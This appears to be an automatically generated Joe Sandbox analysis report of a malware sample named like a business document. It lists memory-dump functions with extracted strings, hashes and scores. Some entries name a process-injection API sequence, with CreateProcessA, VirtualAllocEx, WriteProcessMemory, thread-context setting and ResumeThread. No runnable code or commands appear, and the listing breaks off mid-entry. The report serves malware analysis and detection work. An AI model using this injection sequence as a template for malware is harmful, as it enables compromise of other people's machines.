Uniqueness

Uniqueness Score: -1.00%

Function 01E60048 Relevance: 34.4, Strings: 26, Instructions: 1914COMMON

Download Yara Rule

Strings

(E>, xrefs: 01E61451
(E>, xrefs: 01E613E9
xD>, xrefs: 01E61359
4'p, xrefs: 01E61559
4'p, xrefs: 01E61549
(E>, xrefs: 01E61461
\C>, xrefs: 01E612B6
\C>, xrefs: 01E61261
\C>, xrefs: 01E612A6
0<>, xrefs: 01E60F09
(E>, xrefs: 01E61496
0<>, xrefs: 01E60F17
\C>, xrefs: 01E61271
0<>, xrefs: 01E60F8F
xD>, xrefs: 01E6139E
0<>, xrefs: 01E60FBE
xD>, xrefs: 01E612E3
xD>, xrefs: 01E612F1
(E>, xrefs: 01E613DB
xD>, xrefs: 01E61369
\C>, xrefs: 01E611F9
xD>, xrefs: 01E613AE
\C>, xrefs: 01E611EB
0<>, xrefs: 01E60FCE
(E>, xrefs: 01E614A6
0<>, xrefs: 01E60F7F

Memory Dump Source

Source File: 00000000.00000002.356349308.0000000001E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e60000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (E>$(E>$(E>$(E>$(E>$(E>$0<>$0<>$0<>$0<>$0<>$0<>$4'p$4'p$\C>$\C>$\C>$\C>$\C>$\C>$xD>$xD>$xD>$xD>$xD>$xD>
API String ID: 0-1657193524
Opcode ID: 786b69b646f54306b7e36057bb58973a017f9e6aae50805f47c580e072428c03
Instruction ID: 57e51660185f89060b9838815775575c7d0c0eb83ae44a2509568d1200b0c35b
Opcode Fuzzy Hash: 786b69b646f54306b7e36057bb58973a017f9e6aae50805f47c580e072428c03
Instruction Fuzzy Hash: 72F2B170949394DFDB178BA8CC58BAE7FB8EF46340F55409AE540AB2E2C3785C45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 046AF7A0 Relevance: 6.6, Strings: 5, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(p, xrefs: 046AF9EE
(p, xrefs: 046AF8B4
(p, xrefs: 046AFAE9
(p, xrefs: 046AF9C2
(p, xrefs: 046AF90B

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p$(p$(p$(p$(p
API String ID: 0-1887976078
Opcode ID: b146487b111fe75dfd4cc569c41d49dd41fed87fa921e5eefbe2b7f48772ecb2
Instruction ID: 92c27d873ddbf6bd090e7c69ef44e3b469ddbe96df69fc173a7a554cc965a18a
Opcode Fuzzy Hash: b146487b111fe75dfd4cc569c41d49dd41fed87fa921e5eefbe2b7f48772ecb2
Instruction Fuzzy Hash: 2DC104327006549FD718DF68E841AAE3BE6EFC5714B14816AE806CB3A5DB35EC07CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01E61598 Relevance: 5.2, Strings: 4, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'p, xrefs: 01E61878
0<>, xrefs: 01E61672
0<>, xrefs: 01E61682
4'p, xrefs: 01E61888

Memory Dump Source

Source File: 00000000.00000002.356349308.0000000001E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e60000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 0<>$0<>$4'p$4'p
API String ID: 0-974067172
Opcode ID: a4d8d8683eb00405441bbf94b060426a50546afdd2421f03f690156d8540c10e
Instruction ID: 1e99ee4be05a1052ed48b042da6b7d7dccdb4731c53741f57832f65efeea67d1
Opcode Fuzzy Hash: a4d8d8683eb00405441bbf94b060426a50546afdd2421f03f690156d8540c10e
Instruction Fuzzy Hash: 64A1F638E00209CFCB1ADFA9D4486EDBBB6FF89345F509169E412A7390CB785942CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01F1B9D8 Relevance: 4.2, Strings: 3, Instructions: 480
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hp, xrefs: 01F1BEAD
Hp, xrefs: 01F1BEDC
Hp, xrefs: 01F1BF2C

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: Hp$Hp$Hp
API String ID: 0-3665545250
Opcode ID: 784168253111cbd1654760aa3eb9402ab5252c34c42af91288a50b44a307206c
Instruction ID: 01c656057d98301d1956bb843305b434f8bc57c05d875c741f91a757ff130a61
Opcode Fuzzy Hash: 784168253111cbd1654760aa3eb9402ab5252c34c42af91288a50b44a307206c
Instruction Fuzzy Hash: A9124C71A00704DFDB29DFA9D494A6EBBF2FF88300B14852DE5069B359DB32AD46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01F1D280 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'p, xrefs: 01F1D49A
4'p, xrefs: 01F1D579
4'p, xrefs: 01F1D5F9

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p$4'p$4'p
API String ID: 0-3087666796
Opcode ID: 0c0d68b95464d933497006a20b88925797f7213745d4bb8d0805062566164d15
Instruction ID: e0acb7704d01e342d27642bcf67cb4052be931f788f823feefd63cd8e5ddb918
Opcode Fuzzy Hash: 0c0d68b95464d933497006a20b88925797f7213745d4bb8d0805062566164d15
Instruction Fuzzy Hash: 4CF1EF34B01619DFDB19DFA4D998A9DBBB2FF88300F158159E906AB365CB71EC42CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01EF0978 Relevance: 4.1, Strings: 3, Instructions: 358
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(p, xrefs: 01EF0AA1
Hp, xrefs: 01EF0AF9
(p, xrefs: 01EF0ACD

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p$(p$Hp
API String ID: 0-3801172158
Opcode ID: c0e889153da46b389e066a59817da92cd2696362f21e39cf41b4c37f64d15981
Instruction ID: 9bb956fc9127ed04fcda760ed65e69ef64fe6e51bac8152dccfde1390f782399
Opcode Fuzzy Hash: c0e889153da46b389e066a59817da92cd2696362f21e39cf41b4c37f64d15981
Instruction Fuzzy Hash: 4EE16334A00209DFCB15EF68E49499DBBB2FF89310F108569F906AB365DB31ED46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01F15C01 Relevance: 3.8, Strings: 3, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 01F1578B
y, xrefs: 01F157B7
h, xrefs: 01F15C0F

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: $h$y
API String ID: 0-3058062038
Opcode ID: 002f8c46ae0d0443f30049f3e2bc6108f70082d47dc64a309c246814479d8f37
Instruction ID: 2cd2ca29b63df006093af37a52499f664b378e7aecd3bc096830e7c7e6ddcf94
Opcode Fuzzy Hash: 002f8c46ae0d0443f30049f3e2bc6108f70082d47dc64a309c246814479d8f37
Instruction Fuzzy Hash: B201C474D01229CFDB22DF54C9887DDBBB1BB4A315F5491DAC419B2254C7364A84CF45

Uniqueness

Uniqueness Score: -1.00%

Function 046ACDD8 Relevance: 2.7, Strings: 2, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(p, xrefs: 046ACEE6
Hp, xrefs: 046ACF75

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p$Hp
API String ID: 0-3691929625
Opcode ID: 7b9f52f56f1161fc5e50432a5bfc8c6e4fdae320f3df74f4f0e2bb3f2163b5fa
Instruction ID: 17cf6ce726c52996b60d6cc72228215b8a6b558f7d37b366547773958673bc50
Opcode Fuzzy Hash: 7b9f52f56f1161fc5e50432a5bfc8c6e4fdae320f3df74f4f0e2bb3f2163b5fa
Instruction Fuzzy Hash: F7519A30B007009FD729AF68D454A2E7BA7AFC9714B64446DE4168B3A5DF35EC07CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01E60001 Relevance: 2.7, Strings: 1, Instructions: 1419COMMON

Download Yara Rule

Strings

4'p, xrefs: 01E61549

Memory Dump Source

Source File: 00000000.00000002.356349308.0000000001E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e60000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: 9df1cd9c84a6db17b5d69cebfe63de6cb9261bfd4ecfa89d822a43380bc77f3f
Instruction ID: 0a88495eb0faee7f1dd8f7f0853e09318f70c95b095e26dd962b197431cfbd01
Opcode Fuzzy Hash: 9df1cd9c84a6db17b5d69cebfe63de6cb9261bfd4ecfa89d822a43380bc77f3f
Instruction Fuzzy Hash: D4B24B7054D385AFD7139B78CC59BAA3FB8AF47700F1904DAE540DB2E2D2685849CB72

Uniqueness

Uniqueness Score: -1.00%

Function 001E1E88 Relevance: 2.6, Strings: 2, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tep, xrefs: 001E1F01
Tep, xrefs: 001E1F14

Memory Dump Source

Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: Tep$Tep
API String ID: 0-347264811
Opcode ID: 1358a8d95339ab71ee6d24de46501dcdb0627d1e25e310d5f52184c4c244ce93
Instruction ID: daa5265b347963c950db33be17d5d9af86f123bfe4d9ff694fd018b04f8ca528
Opcode Fuzzy Hash: 1358a8d95339ab71ee6d24de46501dcdb0627d1e25e310d5f52184c4c244ce93
Instruction Fuzzy Hash: 39318130B10255AFCB18EFA9D495AADBBF6AF88310F25446DE006EB391CF759C05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01F15480 Relevance: 2.5, Strings: 2, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9, xrefs: 01F15C5E
e, xrefs: 01F15C3E

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 9$e
API String ID: 0-415986556
Opcode ID: 4b4a73645fda932c01561538f4b23bc5a3d25c453cf9095d82b3e3bcf8d472dc
Instruction ID: 86104f654ddb2e3c07e82716df7bede1fd8d2ac90fc7d9aed7cf657908ae79db
Opcode Fuzzy Hash: 4b4a73645fda932c01561538f4b23bc5a3d25c453cf9095d82b3e3bcf8d472dc
Instruction Fuzzy Hash: 23F0F470D06218CFDB22DFA8C4887DCBBB1FB4A310F501199D41AB2259C3361A85CF00

Uniqueness

Uniqueness Score: -1.00%

Function 01F15764 Relevance: 2.5, Strings: 2, Instructions: 21
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 01F1578B
y, xrefs: 01F157B7

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: $y
API String ID: 0-524138444
Opcode ID: 99c22e72c4a0b550a5514f34a08482e317f830c749c24e7bfe57879f803e9dbf
Instruction ID: 2131725e4776722d822b2c99fe1e205e2c7ea7e16271a7754ac38510ed38db9c
Opcode Fuzzy Hash: 99c22e72c4a0b550a5514f34a08482e317f830c749c24e7bfe57879f803e9dbf
Instruction Fuzzy Hash: 0FF0AA74D01229CFDB22DF64C888BDCBBB0BB4A311F5081EAD81DB2254D3365A808F45

Uniqueness

Uniqueness Score: -1.00%

Function 01F1E160 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,p, xrefs: 01F1E4DB

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: ,p
API String ID: 0-2091407873
Opcode ID: ccf1005b66769bc05ae6ef13cf793c9823f2f58cd094d214bf646cb1faca2827
Instruction ID: cb7c2556b9de34da6b22c5dbbda8c4064b7c4af4ef06a14a7b1fc6c027775886
Opcode Fuzzy Hash: ccf1005b66769bc05ae6ef13cf793c9823f2f58cd094d214bf646cb1faca2827
Instruction Fuzzy Hash: 66521975A002289FDB69CF68C941BDDBBF2BF88300F1541D9E909A7356DA319E81CF61

Uniqueness

Uniqueness Score: -1.00%

Function 046AE798 Relevance: 1.8, Strings: 1, Instructions: 533COMMON

Download Yara Rule

Strings

(_p, xrefs: 046AEA2D

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (_p
API String ID: 0-2702063464
Opcode ID: 3623c1ce53becebf97c52870d629c4d7985d232ddcf8a6aed00fab13c3ae0ff1
Instruction ID: ed2737a7133a4b17a0bf5e49aa5e77b0e3693ce1b0a5e3716666eff008fb0352
Opcode Fuzzy Hash: 3623c1ce53becebf97c52870d629c4d7985d232ddcf8a6aed00fab13c3ae0ff1
Instruction Fuzzy Hash: 67226B35B40605DFDB18DFA8C490AADB7B2BF88310F158169E906DB3A5EB72ED41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01F071BC Relevance: 1.8, APIs: 1, Instructions: 267processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01F0742F

Memory Dump Source

Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1044e5828198b32f1dabd10944a8d3093144bcbee58b2307a06f452296835d13
Instruction ID: a2667105c4358a4b04f7ec1de428f2270c8c0eb4f3c3bee316a9f1e8220abcb9
Opcode Fuzzy Hash: 1044e5828198b32f1dabd10944a8d3093144bcbee58b2307a06f452296835d13
Instruction Fuzzy Hash: 23A112B0D00219CFDF21DFA9C8457EEBBB1BF49310F1492A9E898A7280DB759985DF41

Uniqueness

Uniqueness Score: -1.00%

Function 01F071C8 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01F0742F

Memory Dump Source

Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 80e49af5810b445b26adbee100302d36880cdcae0a0f8092cb6fd9864d348a1f
Instruction ID: c9dc6cabd8d84987b970c634172a22415b5cca8a98b8797a4bfe39e4b757c211
Opcode Fuzzy Hash: 80e49af5810b445b26adbee100302d36880cdcae0a0f8092cb6fd9864d348a1f
Instruction Fuzzy Hash: 35A123B0D00219CFDF21DFA9C8457EEBBF1BB09310F1492A9E898A7280DB759985DF41

Uniqueness

Uniqueness Score: -1.00%

Function 01F1F400 Relevance: 1.7, Strings: 1, Instructions: 449COMMON

Download Yara Rule

Strings

$p, xrefs: 01F1F52F

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: $p
API String ID: 0-982128392
Opcode ID: 693ed3d5d9f637471c334bc3b7043b4de77c9d55583f6736cb71246810786a32
Instruction ID: 653d1b4b7d850dc308561906511db1ab5c8eae5f248d064dc357c5aa4288257b
Opcode Fuzzy Hash: 693ed3d5d9f637471c334bc3b7043b4de77c9d55583f6736cb71246810786a32
Instruction Fuzzy Hash: 0DF1A271B002128FDB28DF29C41566EBBE2EF84310F14452AE996CB3E9DB35CD4ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 01F07EB0 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 01F07F88

Memory Dump Source

Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: cd0c639d7f8fc0317c59728b9e06f0d10bbbbe5f33db94fd5d9501d4c2da355f
Instruction ID: dd59e8ec521c0b15e8519ed4af2c60a610f52f328dd021ec49000d5cc6df2065
Opcode Fuzzy Hash: cd0c639d7f8fc0317c59728b9e06f0d10bbbbe5f33db94fd5d9501d4c2da355f
Instruction Fuzzy Hash: 5241BAB5D012589FCF10CFA9D984AEEFBF1FB49314F20942AE814B7250D335AA45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01F07EB8 Relevance: 1.6, APIs: 1, Instructions: 115injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 01F07F88

Memory Dump Source

Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 903283fc15d067a78316a4603cddebe4d3454ef92a162b8d140024698161bf54
Instruction ID: 03a5dd5fc09d025ec73e51b2257027138165036de14352ebdd52a166ff29d6ef
Opcode Fuzzy Hash: 903283fc15d067a78316a4603cddebe4d3454ef92a162b8d140024698161bf54
Instruction Fuzzy Hash: 9541AAB5D012589FCF00CFA9D984AEEFBF1AB49314F24942AE814B7250D335AA45DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01F07BF8 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01F07CA2

Memory Dump Source

Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: acf65c4e39c3c16f2a54fb14d55846b4a03a627db6da850114ea32956d3a5c04
Instruction ID: 399352ebd81abeab4fc7c9c9369044d73fbf3c5758faa68db9875101b7dfc106
Opcode Fuzzy Hash: acf65c4e39c3c16f2a54fb14d55846b4a03a627db6da850114ea32956d3a5c04
Instruction Fuzzy Hash: 283187B9D002589FCF10CFA9D984AAEFBB5BB49310F10942AE814B7250D735A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04C8DAB8 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 04C8DB5C

Memory Dump Source

Source File: 00000000.00000002.359111117.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c80000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 43191390eb12eed4a5d2aa57b3d994ff58c3f74baacc4afd25c78101e693245c
Instruction ID: c9ef7440133cff8dafe7cac8b19c02b141953d0338b1e665d9a957a17fc6f745
Opcode Fuzzy Hash: 43191390eb12eed4a5d2aa57b3d994ff58c3f74baacc4afd25c78101e693245c
Instruction Fuzzy Hash: 6C31A9B4D002089FCF10CFA9D984AEEFBB1EF49314F24942AE815B7214D735A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01F07578 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 01F07627

Memory Dump Source

Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 74619949482366c8a17da8d5b9473fb36398aa255ad9e8f12a2186553c73837e
Instruction ID: 02cbd2869fe568ee677270df790ac9b5dc2792691e338c47e8a8b0ea5fd64588
Opcode Fuzzy Hash: 74619949482366c8a17da8d5b9473fb36398aa255ad9e8f12a2186553c73837e
Instruction Fuzzy Hash: 9E31BBB5D002589FCB10DFAAD984AEEFFF1AF49314F24806AE415B7240D739A949CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01F08249 Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?), ref: 01F082CE

Memory Dump Source

Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5ba190180c0cb8cc583a6d5ae7cda506680af890a54ab83570fe4f8759ecef14
Instruction ID: 2295b4274dd6ab068b723d7472dfee38789a45b9a700efe6259fbb8c052f5711
Opcode Fuzzy Hash: 5ba190180c0cb8cc583a6d5ae7cda506680af890a54ab83570fe4f8759ecef14
Instruction Fuzzy Hash: 4331CCB4D002189FCF14CFA9D984AEEFBB1AF49320F24942AE815B7350C735A905CF94

Uniqueness

Uniqueness Score: -1.00%

Function 01F08250 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?), ref: 01F082CE

Memory Dump Source

Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e561e1f0a290bf223c4ba8ad55156eb7460554e23dbe7518922b33bc628a4d82
Instruction ID: ba4f2e193606ea68f3b78253bf698eae024272cafeb32dd6412c9822b1ff3eca
Opcode Fuzzy Hash: e561e1f0a290bf223c4ba8ad55156eb7460554e23dbe7518922b33bc628a4d82
Instruction Fuzzy Hash: 3E31CCB4D002089FCF10CFA9D984AEEFBB5AF49310F10942AE814B7350C735A905CF64

Uniqueness

Uniqueness Score: -1.00%

Function 01F1D271 Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

4'p, xrefs: 01F1D49A

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: d9fc883e5ed52a0b911229a37e6c750a426f1a772f57d41f3f380c0e31693fa0
Instruction ID: c31ea6109f287e33c476fbb2d81ecfafa0782c60e1807ac28ecbcd35707aa53d
Opcode Fuzzy Hash: d9fc883e5ed52a0b911229a37e6c750a426f1a772f57d41f3f380c0e31693fa0
Instruction Fuzzy Hash: 60A10234A10619DFDB14EFA4D898A9DB7B2FF88300F158159E505AB369DB71EC46CF40

Uniqueness

Uniqueness Score: -1.00%

Function 046AEFA0 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

Plp, xrefs: 046AF0F8

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: Plp
API String ID: 0-2701032082
Opcode ID: 7220086d66e9184c67773defd236ec947791cba1f217df75de89a1d5e02dbf7d
Instruction ID: 5c89b01f486f032a65a5935ce48b53f0ccf218673c297a91555ea7f28f809cc7
Opcode Fuzzy Hash: 7220086d66e9184c67773defd236ec947791cba1f217df75de89a1d5e02dbf7d
Instruction Fuzzy Hash: DF61F2347006048FDB09DF68C898AAE7BF2AF89705F2540A9E505CB3B5DB71EC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 046A9EC8 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

(p, xrefs: 046A9F3C

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p
API String ID: 0-4175582459
Opcode ID: cb38f55c7b6e2e6360fa1f96b5bc1176d9c28e42ce39939c03d5a7328bf7c9e3
Instruction ID: 09cff83a20657e0d497c6ca1166f0f2f3dd7bc53659bab94fc2ae29a4e3d4db0
Opcode Fuzzy Hash: cb38f55c7b6e2e6360fa1f96b5bc1176d9c28e42ce39939c03d5a7328bf7c9e3
Instruction Fuzzy Hash: 5251F331A006168FCB00DF68C484AAAFBB1FF85324B2586AAE615DB341D730FC56CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 046A8F08 Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

pp, xrefs: 046A8FB8

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: pp
API String ID: 0-2116140168
Opcode ID: 34dd27f26636ceb3e79c2d177c39c35dc4a52832f0284a42e92855ae7bc13dbd
Instruction ID: 2f4f3c9120911217c09f09876cc178f0836107b8228847961d21d49279c327f9
Opcode Fuzzy Hash: 34dd27f26636ceb3e79c2d177c39c35dc4a52832f0284a42e92855ae7bc13dbd
Instruction Fuzzy Hash: 8E513E76600100AFCB499FA8D905D297BB7FF8C31471A81D9F2099B376DA36DC21DB51

Uniqueness

Uniqueness Score: -1.00%

Function 01F12288 Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

TJp, xrefs: 01F12372

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

